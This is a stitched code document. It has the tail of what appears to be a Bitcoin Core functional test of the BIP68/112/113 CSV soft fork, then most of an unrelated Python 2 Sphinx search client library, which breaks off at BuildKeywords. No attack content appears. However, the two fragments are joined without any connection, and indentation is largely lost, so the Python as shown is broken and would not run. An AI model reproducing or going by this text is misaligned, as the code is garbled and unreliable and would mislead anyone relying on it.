self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("Test version 2 txs")
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
success_txs.append(bip113signed2)
success_txs.append(bip112tx_special_v2)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v2))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v2))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v2))
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# 1 more version 4 block to get us to height 575 so the fork should now be active for the next block
test_blocks = self.generate_blocks(1, 4)
self.sync_blocks(test_blocks)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'active')
self.log.info("Post-Soft Fork Tests.")
self.log.info("BIP 113 tests")
# BIP 113 tests should now fail regardless of version number if nLockTime isn't satisfied by new rules
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
self.sync_blocks([self.create_test_block([bip113tx])], success=False)
# BIP 113 tests should now pass if the locktime is < MTP
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
self.sync_blocks([self.create_test_block([bip113tx])])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Next block height = 580 after 4 blocks of random version
test_blocks = self.generate_blocks(4, 1234)
self.sync_blocks(test_blocks)
self.log.info("BIP 68 tests")
self.log.info("Test version 1 txs - all should still pass")
success_txs = []
success_txs.extend(all_rlt_txs(bip68txs_v1))
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("Test version 2 txs")
# All txs with SEQUENCE_LOCKTIME_DISABLE_FLAG set pass
bip68success_txs = [tx['tx'] for tx in bip68txs_v2 if tx['sdf']]
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# All txs without flag fail as we are at delta height = 8 < 10 and delta time = 8 * 600 < 10 * 512
bip68timetxs = [tx['tx'] for tx in bip68txs_v2 if not tx['sdf'] and tx['stf']]
for tx in bip68timetxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
bip68heighttxs = [tx['tx'] for tx in bip68txs_v2 if not tx['sdf'] and not tx['stf']]
for tx in bip68heighttxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Advance one block to 581
test_blocks = self.generate_blocks(1, 1234)
self.sync_blocks(test_blocks)
# Height txs should fail and time txs should now pass 9 * 600 > 10 * 512
bip68success_txs.extend(bip68timetxs)
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
for tx in bip68heighttxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Advance one block to 582
test_blocks = self.generate_blocks(1, 1234)
self.sync_blocks(test_blocks)
# All BIP 68 txs should pass
bip68success_txs.extend(bip68heighttxs)
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("BIP 112 tests")
self.log.info("Test version 1 txs")
# -1 OP_CSV tx should fail
self.sync_blocks([self.create_test_block([bip112tx_special_v1])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 1 txs should still pass
success_txs = [tx['tx'] for tx in bip112txs_vary_OP_CSV_v1 if tx['sdf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v1 if tx['sdf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV, version 1 txs should now fail
fail_txs = all_rlt_txs(bip112txs_vary_nSequence_v1)
fail_txs += all_rlt_txs(bip112txs_vary_nSequence_9_v1)
        fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_v1 if not tx['sdf']]
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v1 if not tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
self.log.info("Test version 2 txs")
# -1 OP_CSV tx should fail
self.sync_blocks([self.create_test_block([bip112tx_special_v2])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 2 txs should pass (all sequence locks are met)
success_txs = [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if tx['sdf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v2 if tx['sdf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV for all remaining txs ##
# All txs with nSequence 9 should fail either due to earlier mismatch or failing the CSV check
fail_txs = all_rlt_txs(bip112txs_vary_nSequence_9_v2)
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v2 if not tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in nSequence, tx should fail
fail_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# If sequencelock types mismatch, tx should fail
fail_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if not tx['sdf'] and tx['stf']]
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and tx['stf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Remaining txs should pass, just test masking works properly
success_txs = [tx['tx'] for tx in bip112txs_vary_nSequence_v2 if not tx['sdf'] and not tx['stf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and not tx['stf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Additional test, of checking that comparison of two time types works properly
time_txs = []
for tx in [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if not tx['sdf'] and tx['stf']]:
tx.vin[0].nSequence = BASE_RELATIVE_LOCKTIME | SEQ_TYPE_FLAG
signtx = sign_transaction(self.nodes[0], tx)
time_txs.append(signtx)
self.sync_blocks([self.create_test_block(time_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# TODO: Test empty stack fails
if __name__ == '__main__':
BIP68_112_113Test().main()
|
import sys
import select
import socket
import re
from struct import *
SEARCHD_COMMAND_SEARCH = 0
SEARCHD_COMMAND_EXCERPT = 1
SEARCHD_COMMAND_UPDATE = 2
SEARCHD_COMMAND_KEYWORDS = 3
SEARCHD_COMMAND_PERSIST = 4
SEARCHD_COMMAND_FLUSHATTRS = 7
VER_COMMAND_SEARCH = 0x118
VER_COMMAND_EXCERPT = 0x103
VER_COMMAND_UPDATE = 0x102
VER_COMMAND_KEYWORDS = 0x100
VER_COMMAND_FLUSHATTRS = 0x100
SEARCHD_OK = 0
SEARCHD_ERROR = 1
SEARCHD_RETRY = 2
SEARCHD_WARNING = 3
SPH_MATCH_ALL = 0
SPH_MATCH_ANY = 1
SPH_MATCH_PHRASE = 2
SPH_MATCH_BOOLEAN = 3
SPH_MATCH_EXTENDED = 4
SPH_MATCH_FULLSCAN = 5
SPH_MATCH_EXTENDED2 = 6
SPH_RANK_PROXIMITY_BM25 = 0 # default mode, phrase proximity major factor and BM25 minor one
SPH_RANK_BM25 = 1 # statistical mode, BM25 ranking only (faster but worse quality)
SPH_RANK_NONE = 2 # no ranking, all matches get a weight of 1
SPH_RANK_WORDCOUNT = 3 # simple word-count weighting, rank is a weighted sum of per-field keyword occurrence counts
SPH_RANK_PROXIMITY = 4
SPH_RANK_MATCHANY = 5
SPH_RANK_FIELDMASK = 6
SPH_RANK_SPH04 = 7
SPH_RANK_TOTAL = 8
SPH_SORT_RELEVANCE = 0
SPH_SORT_ATTR_DESC = 1
SPH_SORT_ATTR_ASC = 2
SPH_SORT_TIME_SEGMENTS = 3
SPH_SORT_EXTENDED = 4
SPH_SORT_EXPR = 5
SPH_FILTER_VALUES = 0
SPH_FILTER_RANGE = 1
SPH_FILTER_FLOATRANGE = 2
SPH_ATTR_NONE = 0
SPH_ATTR_INTEGER = 1
SPH_ATTR_TIMESTAMP = 2
SPH_ATTR_ORDINAL = 3
SPH_ATTR_BOOL = 4
SPH_ATTR_FLOAT = 5
SPH_ATTR_BIGINT = 6
SPH_ATTR_STRING = 7
SPH_ATTR_MULTI = 0X40000000L
SPH_ATTR_TYPES = (SPH_ATTR_NONE,
SPH_ATTR_INTEGER,
SPH_ATTR_TIMESTAMP,
SPH_ATTR_ORDINAL,
SPH_ATTR_BOOL,
SPH_ATTR_FLOAT,
SPH_ATTR_BIGINT,
SPH_ATTR_STRING,
SPH_ATTR_MULTI)
SPH_GROUPBY_DAY = 0
SPH_GROUPBY_WEEK = 1
SPH_GROUPBY_MONTH = 2
SPH_GROUPBY_YEAR = 3
SPH_GROUPBY_ATTR = 4
SPH_GROUPBY_ATTRPAIR = 5
class SphinxClient:
def __init__ (self):
"""
Create a new client object, and fill defaults.
"""
self._host = 'localhost' # searchd host (default is "localhost")
self._port = 9312 # searchd port (default is 9312)
self._path = None # searchd unix-domain socket path
self._socket = None
        self._offset = 0 # how many records to seek from result-set start (default is 0)
        self._limit = 20 # how many records to return from result-set starting at offset (default is 20)
self._mode = SPH_MATCH_ALL # query matching mode (default is SPH_MATCH_ALL)
self._weights = [] # per-field weights (default is 1 for all fields)
self._sort = SPH_SORT_RELEVANCE # match sorting mode (default is SPH_SORT_RELEVANCE)
        self._sortby = '' # attribute to sort by (default is "")
self._min_id = 0 # min ID to match (default is 0)
self._max_id = 0 # max ID to match (default is UINT_MAX)
self._filters = [] # search filters
self._groupby = '' # group-by attribute name
self._groupfunc = SPH_GROUPBY_DAY # group-by function (to pre-process group-by attribute value with)
self._groupsort = '@group desc' # group-by sorting clause (to sort groups in result set with)
self._groupdistinct = '' # group-by count-distinct attribute
self._maxmatches = 1000 # max matches to retrieve
self._cutoff = 0 # cutoff to stop searching at
self._retrycount = 0 # distributed retry count
self._retrydelay = 0 # distributed retry delay
self._anchor = {} # geographical anchor point
self._indexweights = {} # per-index weights
self._ranker = SPH_RANK_PROXIMITY_BM25 # ranking mode
self._maxquerytime = 0 # max query time, milliseconds (default is 0, do not limit)
self._fieldweights = {} # per-field-name weights
self._overrides = {} # per-query attribute values overrides
self._select = '*' # select-list (attributes or expressions, with optional aliases)
self._error = '' # last error message
self._warning = '' # last warning message
self._reqs = [] # requests array for multi-query
def __del__ (self):
if self._socket:
self._socket.close()
def GetLastError (self):
"""
Get last error message (string).
"""
return self._error
def GetLastWarning (self):
"""
Get last warning message (string).
"""
return self._warning
def SetServer (self, host, port = None):
"""
Set searchd server host and port.
"""
assert(isinstance(host, str))
if host.startswith('/'):
self._path = host
return
elif host.startswith('unix://'):
self._path = host[7:]
return
assert(isinstance(port, int))
self._host = host
self._port = port
self._path = None
def _Connect (self):
"""
INTERNAL METHOD, DO NOT CALL. Connects to searchd server.
"""
if self._socket:
# we have a socket, but is it still alive?
sr, sw, _ = select.select ( [self._socket], [self._socket], [], 0 )
            # this is how an alive socket should look
            if len(sr)==0 and len(sw)==1:
                return self._socket
            # oops, looks like it was closed, let's reopen
self._socket.close()
self._socket = None
        sock = None
        try:
if self._path:
af = socket.AF_UNIX
addr = self._path
desc = self._path
else:
af = socket.AF_INET
addr = ( self._host, self._port )
desc = '%s;%s' % addr
sock = socket.socket ( af, socket.SOCK_STREAM )
sock.connect ( addr )
except socket.error, msg:
if sock:
sock.close()
self._error = 'connection to %s failed (%s)' % ( desc, msg )
return
        v = unpack('>L', sock.recv(4))[0]
        if v<1:
sock.close()
self._error = 'expected searchd protocol version, got %s' % v
return
# all ok, send my version
sock.send(pack('>L', 1))
return sock
def _GetResponse (self, sock, client_ver):
"""
INTERNAL METHOD, DO NOT CALL. Gets and checks response packet from searchd server.
"""
(status, ver, length) = unpack('>2HL', sock.recv(8))
response = ''
left = length
while left>0:
chunk = sock.recv(left)
if chunk:
response += chunk
left -= len(chunk)
else:
break
if not self._socket:
sock.close()
# check response
read = len(response)
if not response or read!=length:
if length:
self._error = 'failed to read searchd response (status=%s, ver=%s, len=%s, read=%s)' \
% (status, ver, length, read)
else:
self._error = 'received zero-sized searchd response'
return None
# check status
if status==SEARCHD_WARNING:
wend = 4 + unpack ( '>L', response[0:4] )[0]
self._warning = response[4:wend]
return response[wend:]
if status==SEARCHD_ERROR:
self._error = 'searchd error: '+response[4:]
return None
if status==SEARCHD_RETRY:
self._error = 'temporary searchd error: '+response[4:]
return None
if status!=SEARCHD_OK:
self._error = 'unknown status code %d' % status
return None
# check version
if ver<client_ver:
self._warning = 'searchd command v.%d.%d older than client\'s v.%d.%d, some options might not work' \
% (ver>>8, ver&0xff, client_ver>>8, client_ver&0xff)
return response
def SetLimits (self, offset, limit, maxmatches=0, cutoff=0):
"""
Set offset and count into result set, and optionally set max-matches and cutoff limits.
"""
assert ( type(offset) in [int,long] and 0<=offset<16777216 )
assert ( type(limit) in [int,long] and 0<limit<16777216 )
assert(maxmatches>=0)
self._offset = offset
self._limit = limit
if maxmatches>0:
self._maxmatches = maxmatches
if cutoff>=0:
self._cutoff = cutoff
def SetMaxQueryTime (self, maxquerytime):
"""
Set maximum query time, in milliseconds, per-index. 0 means 'do not limit'.
"""
        assert(isinstance(maxquerytime,int) and maxquerytime>=0)
self._maxquerytime = maxquerytime
def SetMatchMode (self, mode):
"""
Set matching mode.
"""
assert(mode in [SPH_MATCH_ALL, SPH_MATCH_ANY, SPH_MATCH_PHRASE, SPH_MATCH_BOOLEAN, SPH_MATCH_EXTENDED, SPH_MATCH_FULLSCAN, SPH_MATCH_EXTENDED2])
self._mode = mode
def SetRankingMode (self, ranker):
"""
Set ranking mode.
"""
assert(ranker>=0 and ranker<SPH_RANK_TOTAL)
self._ranker = ranker
def SetSortMode ( self, mode, clause='' ):
"""
Set sorting mode.
"""
assert ( mode in [SPH_SORT_RELEVANCE, SPH_SORT_ATTR_DESC, SPH_SORT_ATTR_ASC, SPH_SORT_TIME_SEGMENTS, SPH_SORT_EXTENDED, SPH_SORT_EXPR] )
assert ( isinstance ( clause, str ) )
self._sort = mode
self._sortby = clause
def SetWeights (self, weights):
"""
Set per-field weights.
WARNING, DEPRECATED; do not use it! use SetFieldWeights() instead
"""
assert(isinstance(weights, list))
for w in weights:
AssertUInt32 ( w )
self._weights = weights
def SetFieldWeights (self, weights):
"""
Bind per-field weights by name; expects (name,field_weight) dictionary as argument.
"""
assert(isinstance(weights,dict))
for key,val in weights.items():
assert(isinstance(key,str))
AssertUInt32 ( val )
self._fieldweights = weights
def SetIndexWeights (self, weights):
"""
Bind per-index weights by name; expects (name,index_weight) dictionary as argument.
"""
assert(isinstance(weights,dict))
for key,val in weights.items():
assert(isinstance(key,str))
AssertUInt32(val)
self._indexweights = weights
def SetIDRange (self, minid, maxid):
"""
Set IDs range to match.
        Only match records whose document ID is between 'minid' and 'maxid' (inclusive).
"""
assert(isinstance(minid, (int, long)))
assert(isinstance(maxid, (int, long)))
assert(minid<=maxid)
self._min_id = minid
self._max_id = maxid
def SetFilter ( self, attribute, values, exclude=0 ):
"""
Set values set filter.
Only match records where 'attribute' value is in given 'values' set.
"""
assert(isinstance(attribute, str))
assert iter(values)
for value in values:
AssertInt32 ( value )
self._filters.append ( { 'type':SPH_FILTER_VALUES, 'attr':attribute, 'exclude':exclude, 'values':values } )
def SetFilterRange (self, attribute, min_, max_, exclude=0 ):
"""
Set range filter.
        Only match records if 'attribute' value is between 'min_' and 'max_' (inclusive).
"""
assert(isinstance(attribute, str))
AssertInt32(min_)
AssertInt32(max_)
assert(min_<=max_)
self._filters.append ( { 'type':SPH_FILTER_RANGE, 'attr':attribute, 'exclude':exclude, 'min':min_, 'max':max_ } )
def SetFilterFloatRange (self, attribute, min_, max_, exclude=0 ):
assert(isinstance(attribute,str))
assert(isinstance(min_,float))
assert(isinstance(max_,float))
assert(min_ <= max_)
self._filters.append ( {'type':SPH_FILTER_FLOATRANGE, 'attr':attribute, 'exclude':exclude, 'min':min_, 'max':max_} )
def SetGeoAnchor (self, attrlat, attrlong, latitude, longitude):
assert(isinstance(attrlat,str))
assert(isinstance(attrlong,str))
assert(isinstance(latitude,float))
assert(isinstance(longitude,float))
self._anchor['attrlat'] = attrlat
self._anchor['attrlong'] = attrlong
self._anchor['lat'] = latitude
self._anchor['long'] = longitude
def SetGroupBy ( self, attribute, func, groupsort='@group desc' ):
"""
Set grouping attribute and function.
"""
assert(isinstance(attribute, str))
assert(func in [SPH_GROUPBY_DAY, SPH_GROUPBY_WEEK, SPH_GROUPBY_MONTH, SPH_GROUPBY_YEAR, SPH_GROUPBY_ATTR, SPH_GROUPBY_ATTRPAIR] )
assert(isinstance(groupsort, str))
self._groupby = attribute
self._groupfunc = func
self._groupsort = groupsort
def SetGroupDistinct (self, attribute):
assert(isinstance(attribute,str))
self._groupdistinct = attribute
def SetRetries (self, count, delay=0):
assert(isinstance(count,int) and count>=0)
assert(isinstance(delay,int) and delay>=0)
self._retrycount = count
self._retrydelay = delay
def SetOverride (self, name, type, values):
assert(isinstance(name, str))
assert(type in SPH_ATTR_TYPES)
assert(isinstance(values, dict))
self._overrides[name] = {'name': name, 'type': type, 'values': values}
def SetSelect (self, select):
assert(isinstance(select, str))
self._select = select
def ResetOverrides (self):
self._overrides = {}
def ResetFilters (self):
"""
Clear all filters (for multi-queries).
"""
self._filters = []
self._anchor = {}
def ResetGroupBy (self):
"""
Clear groupby settings (for multi-queries).
"""
self._groupby = ''
self._groupfunc = SPH_GROUPBY_DAY
self._groupsort = '@group desc'
self._groupdistinct = ''
def Query (self, query, index='*', comment=''):
"""
Connect to searchd server and run given search query.
Returns None on failure; result set hash on success (see documentation for details).
"""
assert(len(self._reqs)==0)
self.AddQuery(query,index,comment)
results = self.RunQueries()
self._reqs = [] # we won't re-run erroneous batch
if not results or len(results)==0:
return None
self._error = results[0]['error']
self._warning = results[0]['warning']
if results[0]['status'] == SEARCHD_ERROR:
return None
return results[0]
def AddQuery (self, query, index='*', comment=''):
"""
Add query to batch.
"""
# build request
req = []
req.append ( pack('>5L', self._offset, self._limit, self._mode, self._ranker, self._sort) )
req.append(pack('>L', len(self._sortby)))
req.append(self._sortby)
if isinstance(query,unicode):
query = query.encode('utf-8')
assert(isinstance(query,str))
req.append(pack('>L', len(query)))
req.append(query)
req.append(pack('>L', len(self._weights)))
for w in self._weights:
req.append(pack('>L', w))
req.append(pack('>L', len(index)))
req.append(index)
req.append(pack('>L',1)) # id64 range marker
req.append(pack('>Q', self._min_id))
req.append(pack('>Q', self._max_id))
# filters
req.append ( pack ( '>L', len(self._filters) ) )
for f in self._filters:
req.append ( pack ( '>L', len(f['attr'])) + f['attr'])
filtertype = f['type']
req.append ( pack ( '>L', filtertype))
if filtertype == SPH_FILTER_VALUES:
req.append ( pack ('>L', len(f['values'])))
for val in f['values']:
req.append ( pack ('>q', val))
elif filtertype == SPH_FILTER_RANGE:
req.append ( pack ('>2q', f['min'], f['max']))
elif filtertype == SPH_FILTER_FLOATRANGE:
req.append ( pack ('>2f', f['min'], f['max']))
req.append ( pack ( '>L', f['exclude'] ) )
# group-by, max-matches, group-sort
req.append ( pack ( '>2L', self._groupfunc, len(self._groupby) ) )
req.append ( self._groupby )
req.append ( pack ( '>2L', self._maxmatches, len(self._groupsort) ) )
req.append ( self._groupsort )
req.append ( pack ( '>LLL', self._cutoff, self._retrycount, self._retrydelay))
req.append ( pack ( '>L', len(self._groupdistinct)))
req.append ( self._groupdistinct)
# anchor point
if len(self._anchor) == 0:
req.append ( pack ('>L', 0))
else:
attrlat, attrlong = self._anchor['attrlat'], self._anchor['attrlong']
latitude, longitude = self._anchor['lat'], self._anchor['long']
req.append ( pack ('>L', 1))
req.append ( pack ('>L', len(attrlat)) + attrlat)
req.append ( pack ('>L', len(attrlong)) + attrlong)
req.append ( pack ('>f', latitude) + pack ('>f', longitude))
# per-index weights
req.append ( pack ('>L',len(self._indexweights)))
for indx,weight in self._indexweights.items():
req.append ( pack ('>L',len(indx)) + indx + pack ('>L',weight))
# max query time
req.append ( pack ('>L', self._maxquerytime) )
# per-field weights
req.append ( pack ('>L',len(self._fieldweights) ) )
for field,weight in self._fieldweights.items():
req.append ( pack ('>L',len(field)) + field + pack ('>L',weight) )
# comment
req.append ( pack('>L',len(comment)) + comment )
# attribute overrides
req.append ( pack('>L', len(self._overrides)) )
for v in self._overrides.values():
req.extend ( ( pack('>L', len(v['name'])), v['name'] ) )
req.append ( pack('>LL', v['type'], len(v['values'])) )
for id, value in v['values'].iteritems():
req.append ( pack('>Q', id) )
if v['type'] == SPH_ATTR_FLOAT:
req.append ( pack('>f', value) )
elif v['type'] == SPH_ATTR_BIGINT:
req.append ( pack('>q', value) )
else:
req.append ( pack('>l', value) )
# select-list
req.append ( pack('>L', len(self._select)) )
req.append ( self._select )
# send query, get response
req = ''.join(req)
self._reqs.append(req)
return
def RunQueries (self):
"""
Run queries batch.
Returns None on network IO failure; or an array of result set hashes on success.
"""
if len(self._reqs)==0:
self._error = 'no queries defined, issue AddQuery() first'
return None
sock = self._Connect()
if not sock:
return None
req = ''.join(self._reqs)
length = len(req)+8
req = pack('>HHLLL', SEARCHD_COMMAND_SEARCH, VER_COMMAND_SEARCH, length, 0, len(self._reqs))+req
sock.send(req)
response = self._GetResponse(sock, VER_COMMAND_SEARCH)
if not response:
return None
nreqs = len(self._reqs)
# parse response
max_ = len(response)
p = 0
results = []
for i in range(0,nreqs,1):
result = {}
results.append(result)
result['error'] = ''
result['warning'] = ''
status = unpack('>L', response[p:p+4])[0]
p += 4
result['status'] = status
if status != SEARCHD_OK:
length = unpack('>L', response[p:p+4])[0]
p += 4
message = response[p:p+length]
p += length
if status == SEARCHD_WARNING:
result['warning'] = message
else:
result['error'] = message
continue
# read schema
fields = []
attrs = []
nfields = unpack('>L', response[p:p+4])[0]
p += 4
while nfields>0 and p<max_:
nfields -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
fields.append(response[p:p+length])
p += length
result['fields'] = fields
nattrs = unpack('>L', response[p:p+4])[0]
p += 4
while nattrs>0 and p<max_:
nattrs -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
attr = response[p:p+length]
p += length
type_ = unpack('>L', response[p:p+4])[0]
p += 4
attrs.append([attr,type_])
result['attrs'] = attrs
# read match count
count = unpack('>L', response[p:p+4])[0]
p += 4
id64 = unpack('>L', response[p:p+4])[0]
p += 4
# read matches
result['matches'] = []
while count>0 and p<max_:
count -= 1
if id64:
doc, weight = unpack('>QL', response[p:p+12])
p += 12
else:
doc, weight = unpack('>2L', response[p:p+8])
p += 8
match = { 'id':doc, 'weight':weight, 'attrs':{} }
for i in range(len(attrs)):
if attrs[i][1] == SPH_ATTR_FLOAT:
match['attrs'][attrs[i][0]] = unpack('>f', response[p:p+4])[0]
elif attrs[i][1] == SPH_ATTR_BIGINT:
match['attrs'][attrs[i][0]] = unpack('>q', response[p:p+8])[0]
p += 4
elif attrs[i][1] == SPH_ATTR_STRING:
slen = unpack('>L', response[p:p+4])[0]
p += 4
match['attrs'][attrs[i][0]] = ''
if slen>0:
match['attrs'][attrs[i][0]] = response[p:p+slen]
p += slen-4
elif attrs[i][1] == (SPH_ATTR_MULTI | SPH_ATTR_INTEGER):
match['attrs'][attrs[i][0]] = []
nvals = unpack('>L', response[p:p+4])[0]
p += 4
for n in range(0,nvals,1):
match['attrs'][attrs[i][0]].append(unpack('>L', response[p:p+4])[0])
p += 4
p -= 4
else:
match['attrs'][attrs[i][0]] = unpack('>L', response[p:p+4])[0]
p += 4
result['matches'].append ( match )
result['total'], result['total_found'], result['time'], words = unpack('>4L', response[p:p+16])
result['time'] = '%.3f' % (result['time']/1000.0)
p += 16
result['words'] = []
while words>0:
words -= 1
length = unpack('>L', response[p:p+4])[0]
p += 4
word = response[p:p+length]
p += length
docs, hits = unpack('>2L', response[p:p+8])
p += 8
result['words'].append({'word':word, 'docs':docs, 'hits':hits})
self._reqs = []
return results
def BuildExcerpts (self, docs, index, words, opts=None):
"""
        Connect to searchd server and generate excerpts from given documents.
"""
if not opts:
opts = {}
if isinstance(words,unicode):
words = words.encode('utf-8')
assert(isinstance(docs, list))
assert(isinstance(index, str))
assert(isinstance(words, str))
assert(isinstance(opts, dict))
sock = self._Connect()
if not sock:
return None
# fixup options
opts.setdefault('before_match', '<b>')
opts.setdefault('after_match', '</b>')
opts.setdefault('chunk_separator', ' ... ')
opts.setdefault('html_strip_mode', 'index')
opts.setdefault('limit', 256)
opts.setdefault('limit_passages', 0)
opts.setdefault('limit_words', 0)
opts.setdefault('around', 5)
opts.setdefault('start_passage_id', 1)
opts.setdefault('passage_boundary', 'none')
# build request
# v.1.0 req
flags = 1 # (remove spaces)
if opts.get('exact_phrase'): flags |= 2
if opts.get('single_passage'): flags |= 4
if opts.get('use_boundaries'): flags |= 8
if opts.get('weight_order'): flags |= 16
if opts.get('query_mode'): flags |= 32
if opts.get('force_all_words'): flags |= 64
if opts.get('load_files'): flags |= 128
if opts.get('allow_empty'): flags |= 256
        if opts.get('emit_zones'): flags |= 512
# mode=0, flags
req = [pack('>2L', 0, flags)]
# req index
req.append(pack('>L', len(index)))
req.append(index)
# req words
req.append(pack('>L', len(words)))
req.append(words)
# options
req.append(pack('>L', len(opts['before_match'])))
req.append(opts['before_match'])
req.append(pack('>L', len(opts['after_match'])))
req.append(opts['after_match'])
req.append(pack('>L', len(opts['chunk_separator'])))
req.append(opts['chunk_separator'])
req.append(pack('>L', int(opts['limit'])))
req.append(pack('>L', int(opts['around'])))
req.append(pack('>L', int(opts['limit_passages'])))
req.append(pack('>L', int(opts['limit_words'])))
req.append(pack('>L', int(opts['start_passage_id'])))
req.append(pack('>L', len(opts['html_strip_mode'])))
req.append((opts['html_strip_mode']))
req.append(pack('>L', len(opts['passage_boundary'])))
req.append((opts['passage_boundary']))
# documents
req.append(pack('>L', len(docs)))
for doc in docs:
if isinstance(doc,unicode):
doc = doc.encode('utf-8')
assert(isinstance(doc, str))
req.append(pack('>L', len(doc)))
req.append(doc)
req = ''.join(req)
# send query, get response
length = len(req)
# add header
req = pack('>2HL', SEARCHD_COMMAND_EXCERPT, VER_COMMAND_EXCERPT, length)+req
wrote = sock.send(req)
response = self._GetResponse(sock, VER_COMMAND_EXCERPT )
if not response:
return []
# parse response
pos = 0
res = []
rlen = len(response)
for i in range(len(docs)):
length = unpack('>L', response[pos:pos+4])[0]
pos += 4
if pos+length > rlen:
self._error = 'incomplete reply'
return []
res.append(response[pos:pos+length])
pos += length
return res
def UpdateAttributes ( self, index, attrs, values, mva=False ):
"""
Update given attribute values on given documents in given indexes.
        Returns the number of updated documents (0 or more) on success, or -1 on failure.
        'attrs' must be a list of strings.
        'values' must be a dict with int keys (document IDs) and list-of-int values (new attribute values).
        The optional boolean parameter 'mva' indicates that MVA attributes are being updated;
        in that case 'values' must be a dict with int keys (document IDs) and lists of lists
        of int values (new MVA attribute values).
Example:
res = cl.UpdateAttributes ( 'test1', [ 'group_id', 'date_added' ], { 2:[123,1000000000], 4:[456,1234567890] } )
"""
assert ( isinstance ( index, str ) )
assert ( isinstance ( attrs, list ) )
assert ( isinstance ( values, dict ) )
for attr in attrs:
assert ( isinstance ( attr, str ) )
for docid, entry in values.items():
AssertUInt32(docid)
assert ( isinstance ( entry, list ) )
assert ( len(attrs)==len(entry) )
for val in entry:
if mva:
assert ( isinstance ( val, list ) )
for vals in val:
AssertInt32(vals)
else:
AssertInt32(val)
# build request
req = [ pack('>L',len(index)), index ]
req.append ( pack('>L',len(attrs)) )
mva_attr = 0
if mva: mva_attr = 1
for attr in attrs:
req.append ( pack('>L',len(attr)) + attr )
req.append ( pack('>L', mva_attr ) )
req.append ( pack('>L',len(values)) )
for docid, entry in values.items():
req.append ( pack('>Q',docid) )
for val in entry:
val_len = val
if mva: val_len = len ( val )
req.append ( pack('>L',val_len ) )
if mva:
for vals in val:
req.append ( pack ('>L',vals) )
# connect, send query, get response
sock = self._Connect()
if not sock:
return None
req = ''.join(req)
length = len(req)
req = pack ( '>2HL', SEARCHD_COMMAND_UPDATE, VER_COMMAND_UPDATE, length ) + req
wrote = sock.send ( req )
response = self._GetResponse ( sock, VER_COMMAND_UPDATE )
if not response:
return -1
# parse response
updated = unpack ( '>L', response[0:4] )[0]
return updated
def BuildKeywords ( self, query, index, hits ):
"""
Connect to searchd server, and generate keywords list for a given query.
Returns None on failure, or a list of keywords on success.
"""
